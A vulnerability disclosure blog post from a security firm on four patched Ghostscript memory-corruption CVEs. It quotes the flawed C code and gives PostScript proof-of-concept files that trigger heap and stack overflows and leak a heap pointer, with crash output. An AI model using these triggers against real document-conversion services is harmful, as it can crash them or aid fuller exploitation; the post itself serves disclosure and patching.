Research Thomas Rinsma 10-31-2024

Ghostscript wrap-up: overflowing buffers

TL;DR

This is an overview of CVE-2024-29506, CVE-2024-29507, CVE-2024-29508, and CVE-2024-29509. A set of memory-corruption-related vulnerabilities in Ghostscript ≤ 10.02.1. These are all the remaining bugs from our research which we did not end up using in an exploit. Some may be exploitable but this depends on whether Ghostscript is compiled with hardening countermeasures.

These vulnerabilities impact web-applications and other services offering document conversion and preview functionalities as these often use Ghostscript under the hood. We recommend verifying whether your solution (indirectly) makes use of Ghostscript and if so, update it to the latest version.

This is the final part of a three-part series on Ghostscript bugs.

Part one covers CVE-2024-29510, a sandbox escape leading to remote code execution (RCE).
Part two covers CVE-2024-29511, a partial sandbox escape leading to an arbitrary file read/write.

The research for the CVEs in this post was performed by @b0n0b0__, Giorgio and Thomas.

Introduction

In addition to PostScript files, Ghostscript can also read and interpret PDF files. To do this it used to invoke a PDF interpreter written in PostScript, but recently (as of 9.56.1) the interpreter has been ported to C, separating it from the PostScript interpreter. This switch prevents issues like ghost in the pdf, a trick allowing one to embed PostScript code inside a PDF, which would be executed by Ghostscript when rendering the PDF.

However, the new C-based interpreter also opens up a new attack surface. As it turns out, this is not just a potential problem with malicious PDF files: it is also (by design) possible to invoke the new PDF interpreter from within PostScript. In essence you can “smuggle” a PDF inside a PostScript file (we could call this pdf in the post). This gives a much more powerful basis to explore the PDF interpreter’s attack surface from, as potential exploits can use PostScript to perform runtime calculations, dynamically generate a payload or trigger the PDF interpreter multiple times.

See part one for an introduction of PostScript, and the -dSAFER sandbox inside which it is normally executed by Ghostscript.

The Ghostscript documentation details a set of operators for interfacing with the PDF interpreter, including the straightforward runpdf:


<file> runpdf -

    Called from the modified PostScript run operator (which copies stdin to a temp file if required). Checks for PDF collections, processes all requested pages.

As documented it expects a <file> object. If we have a PDF file’s contents as a byte-string in PostScript, we have to write it to a file first. Luckily, as explored in part one, this can be done inside the -dSAFER sandbox by writing to /tmp/:


% Create a new file and write some data to it
/PdfOutFile (/tmp/hello.pdf) (w) file def
PdfOutFile (...<binary PDF data>...) writestring
PdfOutFile closefile

% Open it again, but now for reading
/PdfInFile (/tmp/hello.pdf) (r) file def

% Invoke the PDF interpreter on our newly made file
PdfInFile runpdf

To make this more platform-agnostic, we can use the special %ram% prefix instead of a path to a file in /tmp/. Similarly to %pipe%, it results in a pseudo-file which can be read from and written to. These “files” are kept in memory during a PostScript file’s execution, allowing for an easy way to refer to data as a file object, without actually writing to disk. Unlike %pipe%, this is not harmful by itself and hence allowed in the -dSAFER sandbox.

Now we can pass arbitrary PDF data to the interpreter from within PostScript, but it gets even better: we can also configure the PDF interpreter from within PostScript!

The PDF interpreter supports various flags and parameters to tweak its behavior. You’ll usually see these being passed via the command-line when the PDF interpreter is invoked directly. However, in case of runpdf, these parameters are taken from the current PostScript dictionary (think of these as global variables).

As we’ll see in this post, it turns out that validation of several of these parameters is flawed or nonexistent, maybe because they are considered more “trusted” as they’re usually command-line arguments. Vulnerabilities CVE-2024-29509, CVE-2024-29506 and CVE-2024-29507 are all examples of this: memory corruption bugs that can be triggered from PostScript by invoking the PDF interpreter.

CVE-2024-29509 - heap buffer overflow via PDFPassword

A PDF feature you might be familiar with is password protection. A feature allowing a PDF creator to lock (parts of) the document behind a password. This involves both relatively weak protections (relying on the PDF viewer to block certain operations) and actual encryption of data. Several different schemes are defined for this in the PDF standard, determining the algorithm used under the hood.

When the Ghostscript PDF interpreter encounters an encrypted document, it will attempt to use the string parameter PDFPassword as a password to unlock the document. In case the document uses encryption variant R5, the function check_password_R5(...) is called:


static int check_password_R5(pdf_context *ctx, char *Password, int PasswordLen, int KeyLen)
{
    int code;

    if (PasswordLen != 0) {
        pdf_string *P = NULL, *P_UTF8 = NULL;

        code = check_user_password_R5(ctx, Password, PasswordLen, KeyLen);
        if (code >= 0)
            return 0;

        code = check_owner_password_R5(ctx, Password, PasswordLen, KeyLen);
        if (code >= 0)
            return 0;

        /* If the supplied Password fails as the user *and* owner password, maybe its in
         * the locale, not UTF-8, try converting to UTF-8
         */
        code = pdfi_object_alloc(ctx, PDF_STRING, strlen(ctx->encryption.Password), (pdf_obj **)&P);
        if (code < 0)
            return code;
        memcpy(P->data, Password, PasswordLen);
        pdfi_countup(P);
        code = locale_to_utf8(ctx, P, &P_UTF8);
        if (code < 0) {
            pdfi_countdown(P);
            return code;
        }
        code = check_user_password_R5(ctx, (char *)P_UTF8->data, P_UTF8->length, KeyLen);
        if (code >= 0) {
            pdfi_countdown(P);
            pdfi_countdown(P_UTF8);
            return code;
        }

        code = check_owner_password_R5(ctx, (char *)P_UTF8->data, P_UTF8->length, KeyLen);
        pdfi_countdown(P);
        pdfi_countdown(P_UTF8);
        if (code >= 0)
            return code;
    }
    code = check_user_password_R5(ctx, (char *)"", 0, KeyLen);
    if (code >= 0)
        return 0;

    return check_owner_password_R5(ctx, (char *)"", 0, KeyLen);
}

As explained by the comment, the supplied password is converted to UTF-8 for a second attempt in case it is not initially correct (due to encoding differences). Before the locale_to_utf8(...) invocation, the password is memcpy‘d into a newly allocated buffer. This code contains a sneaky bug however: the number of bytes allocated is strlen(ctx->encryption.Password), while the number of bytes copied is PasswordLen. The latter is the size of the PDFPassword PostScript string. Notably, PostScript strings are dissimilar to C-strings in that they can contain null-bytes (their size is stored separately). In contrast, strlen determines the string’s length by the position of the first null-byte it encounters. This results in a buffer that is potentially too small for the data that is copied into it, and hence a buffer overflow.

Let’s look at a concrete example (\000 encodes a null-byte in PostScript):


/PDFPassword (hello\000world) def

This is a PostScript string of length 11, but strlen will consider it to have a length of 5. So, this means the memcpy looks like this:


//     char[5]     "hello\000world"   11
memcpy(P->data,    Password,          PasswordLen);

Here’s a full PostScript example triggering this bug:


% Simple PDF with R5 encryption.
% This is not a very valid PDF but we only need to reach the decryption logic
/Payload (%PDF-1.7
1 0 obj << /CF << /StdCF << /AuthEvent /DocOpen /CFM /AESV3 /Length 32 >> >>
/Filter /Standard /Length 256
/O <bdc7906c8e8074c880ac23065956c0db6a83d234a942d296364d065edf800b8e32a728ba6916718fbeb70e071a4a33ba>
/OE <7c88773da067c026cc58b5204106d54e320d509ab1d10ac3251f7a14e60d6970>
/P -1028 /Perms <1b6bd44c023964a469d801f598c8d5c4> /R 5 /StmF /StdCF /StrF /StdCF
/U <338dc89fb4a90d45cacf91298759e015a6fb0d3f132af0e6970a0079af12054554e7ab059c5392f9abce8a329b2b154b>
/UE <0d8b18de820855c5855de2560a81db57bb4674946bdf2b25eb6b901386492bd7> /V 5 >>
endobj xref 0 1 0000000000 65535 f 0000000009 00000 n trailer << /Encrypt 1 0 R >> startxref 0) def

% Write the PDF data to a temporary file
/OutFile (/tmp/out) (w) file def
OutFile Payload writestring
OutFile closefile

% Set the PDFPassword to a buffer whose length is larger than its strlen
/PDFPassword (hello\000BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB) def

% Run the PDF interpreter on the file
(/tmp/out) (r) file runpdf

showpage
quit


$ ghostscript -dNODISPLAY 1.ps
GPL Ghostscript 10.02.0 (2023-09-13)
Copyright (C) 2023 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3 and comes with NO WARRANTY:
see the file COPYING for details.
zsh: segmentation fault (core dumped)  ghostscript -dNODISPLAY 1.ps

This vulnerability was fixed in Ghostscript 10.03.0, specifically in this commit.

CVE-2024-29506 - stack buffer overflow in pdfi_apply_filter()

This one is quite straightforward. The boolean PDFDEBUG parameter (controlling the value of ctx->args.pdfdebug) can be set to enable printing of verbose logging information during the PDF parsing process. The function pdfi_apply_filter contains an instance of this:


static int pdfi_apply_filter(pdf_context *ctx, pdf_dict *dict, pdf_name *n, pdf_dict *decode,
                             stream *source, stream **new_stream, bool inline_image)
{
    int code;

    if (ctx->args.pdfdebug)
    {
        char str[100];
        memcpy(str, (const char *)n->data, n->length);
        str[n->length] = '\0';
        dmprintf1(ctx->memory, "FILTER NAME:%s\n", str);
    }
    // ... <rest of function trimmed> ...
}

This is a classic stack buffer overflow: if n->length is larger than 100, the str buffer will overflow, and memcpy will continue copying data onto other elements of the stack.

In this case, the originating buffer n->data comes from the PDF itself. To trigger the bug we make a PDF containing a long filter name:


% Simple PDF with a long (>100) filter name
/Payload (%PDF-1.7
1 0 obj << /Pages << /Count 1 /Kids [ << /Contents 2 0 R /Type /Page >> ] /Type /Pages >> /Type /Catalog >> endobj
2 0 obj << /Length 1
/Filter /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
>> stream a endstream
endobj xref trailer << /Root 1 0 R >> startxref 0) def

% Write the PDF data to a temporary file
/OutFile (/tmp/out) (w) file def
OutFile Payload writestring
OutFile closefile

% Enable PDFDEBUG
/PDFDEBUG true def

% Run the PDF interpreter on the file
(/tmp/out) (r) file runpdf

showpage
quit


$ ghostscript -dNODISPLAY 2.ps
GPL Ghostscript 10.02.0 (2023-09-13)
Copyright (C) 2023 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3 and comes with NO WARRANTY:
see the file COPYING for details.
... <trimmed verbose PDF output> ...
*** buffer overflow detected ***: terminated
zsh: IOT instruction (core dumped)  ghostscript -dNODISPLAY 2.ps

This vulnerability was fixed in Ghostscript 10.03.0, specifically in this commit.

CVE-2024-29507 - stack buffer overflows via CIDFSubstPath and CIDFSubstFont

These are two more stack buffer overflows, both in the PDF interpreter’s font substitution logic (pdfi_open_CIDFont_substitute_file(...)). This logic allows you to configure a font that replaces certain fonts that may be used in the PDF. As part of this, the parameters CIDFSubstPath and CIDFSubstFont are temporarily copied into a stack buffer of a fixed size (4096 bytes). However, in both cases, their length is not checked before the memcpy, resulting in overflows when the parameters are larger than the buffer:


char fontfname[gp_file_name_sizeof]; // 4096

// ... <snip> ...

if (ctx->args.cidfsubstpath.data == NULL) {
    memcpy(fontfname, fsprefix, fsprefixlen);
}
else {
    memcpy(fontfname, ctx->args.cidfsubstpath.data, ctx->args.cidfsubstpath.size);
    fsprefixlen = ctx->args.cidfsubstpath.size;
}

if (ctx->args.cidfsubstfont.data == NULL) {
    // ... <snip> ...
}
else {
    memcpy(fontfname, ctx->args.cidfsubstfont.data, ctx->args.cidfsubstfont.size);
    defcidfallacklen = ctx->args.cidfsubstfont.size;
}

To trigger this bug, we construct a PDF that contains a font definition to make sure the substitution logic is invoked (specifically, /Subtype /Type0 to trigger the right code path), and we set CIDFSubstPath (or CIDFSubstFont) to a very long string:


% Simple PDF with a Type0 font
/Payload (%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages
    << /Type /Pages /Kids [
        << /Type /Page /MediaBox [0 0 10 10] /Resources
            << /ProcSet[/PDF/Text] /Font
                << /F1
                    <<
                        /Type /Font
                        /Subtype /Type0
                        /Encoding /Identity-H
                        /DescendantFonts [ << /Type /Font >> ]
                    >>
                >>
            >> /Contents 2 0 R
        >>] /Count 1
    >>
>> endobj
2 0 obj << /Length 1 >> stream
/F1 1 Tf endstream endobj
xref trailer << /Size 7 /Root 1 0 R >> startxref 0) def

% Write the PDF data to a temporary file
/OutFile (/tmp/out) (w) file def
OutFile Payload writestring
OutFile closefile

% Set the payload to a very long string.
% For brevity, we use `string` to produce a bunch of null bytes
/CIDFSubstPath 9999 string def

% Run the PDF interpreter on the file
(/tmp/out) (r) file runpdf

showpage
quit


$ ghostscript -dNODISPLAY 3.ps
GPL Ghostscript 10.02.0 (2023-09-13)
Copyright (C) 2023 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3 and comes with NO WARRANTY:
see the file COPYING for details.
Processing pages 1 through 1.
Page 1
*** buffer overflow detected ***: terminated
zsh: IOT instruction (core dumped)  ghostscript -dNODISPLAY 3.ps

This vulnerability was fixed in Ghostscript 10.03.0, specifically in this commit.

CVE-2024-29508 - heap pointer leak in pdf_base_font_alloc()

Last but not least, a somewhat unrelated bug. This is not a buffer overflow, but a heap pointer leak. It also does not involve the PDF interpreter, but instead it relates to the PDF output logic (the pdfwrite device).

This vulnerability is not as much of a problem by itself as the others in this post, but it may be a useful primitive in a larger exploit. Being able to obtain the memory address of a known object on the heap will indirectly reveal the location of other objects on the heap (modulo some unpredictability). Hence, this is a partial ASLR bypass.

The function pdf_base_font_alloc used by the pdfwrite device prepares font information for inclusion in an output PDF file. In cases where a font has no given name, it will use a hexadecimal pointer representation (".F" PRI_INTPTR → ".F0x%p") for the constructed BaseFont object’s name:


if (pfname->size > 0) {
    font_name.data = pfname->chars;
    font_name.size = pfname->size;
    while (pdf_has_subset_prefix(font_name.data, font_name.size)) {
        /* Strip off an existing subset prefix. */
        font_name.data += SUBSET_PREFIX_SIZE;
        font_name.size -= SUBSET_PREFIX_SIZE;
    }
} else {
    gs_snprintf(fnbuf, sizeof(fnbuf), ".F" PRI_INTPTR, (intptr_t)copied);
    font_name.data = (byte *)fnbuf;
    font_name.size = strlen(fnbuf);
}

Resulting in, for example:


<</BaseFont/YZKFTQ+.F0x5618b147e378/FontDescriptor 8 0 R/ToUnicode 11 0 R/Type/Font ...

Note the sub-string 0x5618b147e378, which is the leaked pointer in this example.

Just like we did in part one, we can read back the output PDF file as it is being written, from within the same PostScript program. Extracting the pointer is then a matter of some string manipulation. For example, we can take everything after the first occurrence of .F0x until the first / that follows:


% Obtain the PDF file we've just written
/InFile (/tmp/outputpdf) (r) file def
/LeakedData InFile 4096 string readstring pop def
InFile closefile

/Pointer LeakedData (.F0x) search pop pop pop (/) search pop def

% The variable `Pointer` now contains the leaked heap pointer

This vulnerability was fixed in Ghostscript 10.03.0, specifically in this commit. Several other (potential) pointer leaks were also patched in the same commit.

Mitigation

At Codean Labs we realize it is difficult to keep track of dependencies like this and their associated risks. It is our pleasure to take this burden from you. We perform application security assessments in an efficient, thorough and human manner, allowing you to focus on development. Click here to learn more.

The best mitigation against these vulnerabilities is to update your installation of Ghostscript to v10.03.0. However, note that the issue described in part one (CVE-2024-29510) has a higher impact and is only fixed in v10.03.1. Hence, we recommend updating to the latest available version to be as safe as possible against all publicly known attacks.

Timeline

2024-01-24 – reported to Ghostscript issue tracker
2024-01-25 – issues acknowledged by developers
2024-03-07 – Ghostscript 10.03.0 released, mitigating these vulnerabilities
2024-03-24 – CVE-2024-29506, CVE-2024-29507, CVE-2024-29508, and CVE-2024-29509 assigned by Mitre

You’ve seen what we do. Let’s talk about what we can do for you.

Schedule a 30-minute call

Ghostscript wrap-up: overflowing buffers

TL;DR

Introduction

CVE-2024-29509 - heap buffer overflow via PDFPassword

CVE-2024-29506 - stack buffer overflow in pdfi_apply_filter()

CVE-2024-29507 - stack buffer overflows via CIDFSubstPath and CIDFSubstFont

CVE-2024-29508 - heap pointer leak in pdf_base_font_alloc()

Mitigation

Timeline

You’ve seen what we do. Let’s talk about what we can do for you.

Codean uses cookies